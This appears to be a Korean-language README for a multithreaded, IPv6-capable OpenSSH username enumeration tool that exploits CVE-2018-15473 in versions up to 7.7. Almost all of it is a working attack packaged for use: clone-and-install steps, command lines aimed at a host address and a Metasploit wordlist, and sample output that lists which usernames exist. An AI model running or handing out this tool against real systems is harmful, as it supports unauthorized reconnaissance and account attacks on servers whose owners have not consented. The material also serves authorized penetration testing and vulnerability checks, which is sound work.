
멀티스레드, IPv6 인식, 워드리스트/단일 사용자 사용자명 열거 (CVE-2018-15473을 통한)
OpenSSH 7.7까지의 버전은 잘못된 인증 사용자에 대한 패킷이 완전히 파싱될 때까지 지연시키지 않아서, auth2-gss.c, auth2-hostbased.c, auth2-pubkey.c와 관련된 사용자 열거 취약점에 취약합니다.
배포판에 맞는 openssl-dev 패키지를 설치해야 할 수도 있습니다.
# 참고: 칼리(Kali)에 설치하는 경우 pip install은 건너뛸 수 있습니다. paramiko가 이미 있습니다.
git clone https://gitlab.com/epi052/cve-2018-15473.git
cd cve-2018-15473
pip install -r requirements.txt
# - 또는 -
pipenv install -r requirements.txt # 당신이 멋지다면
chmod u+x ssh-username-enum.py
단일 사용자 이름
(cve-2018-15473)─> ./ssh-username-enum.py -u epi 192.168.1.2
[+] epi found!
단어 목록으로 10개의 스레드 사용 (기본값은 4)
(cve-2018-15473)─> ./ssh-username-enum.py -t 10 -w /usr/share/metasploit-framework/data/wordlists/unix_users.txt 192.168.1.2
[+] avahi found!
[+] avahi-autoipd found!
[+] backup found!
[+] daemon found!
[+] bin found!
------8<------
포트 2222의 IPv6 주소 및 상세 출력 증가!
(cve-2018-15473)─> ./ssh-username-enum.py -6 -p 2222 -v -w /usr/share/metasploit-framework/data/wordlists/unix_users.txt '::1'
[-] 4Dgifts not found
[-] demo not found
[-] checkfs not found
[-] anon not found
[-] EZsetup not found
[-] auditor not found
[-] demos not found
[-] OutOfBox not found
[-] checkfsys not found
[+] avahi found!
[-] diag not found
[-] ROOT not found
[-] checksys not found
[-] cmwlogin not found
[+] avahi-autoipd found!
------8<------